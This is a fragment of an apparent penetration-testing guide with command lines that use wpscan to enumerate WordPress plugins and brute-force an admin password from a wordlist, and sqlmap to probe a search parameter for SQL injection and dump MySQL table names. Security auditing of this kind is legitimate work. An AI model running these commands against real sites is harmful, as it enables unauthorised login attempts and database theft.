results): wpscan -u domaintocheck.com -e p --wp-plugins-dir content/plugins/ WPscan can also ‘brute force’ using dictionaries with passwords : wpscan -u domaintocheck.com --wordlist popularpass.txt --username admin
to persist your session for future reference • Be sure you have plenty of memory and space as these sessions can grow quite large (200mb-500mb is standard)
-u “http://domaintocheck.com/search?search=1” --threads=3 -- risk=2 --level=2 If you know your target platform (say MySQL) and want only table names, you can speedup the process: sqlmap -u "http://domaintocheck.com/search?search=1" --threads=3 -- risk=2 --level=2 --tables --dbms=MySQL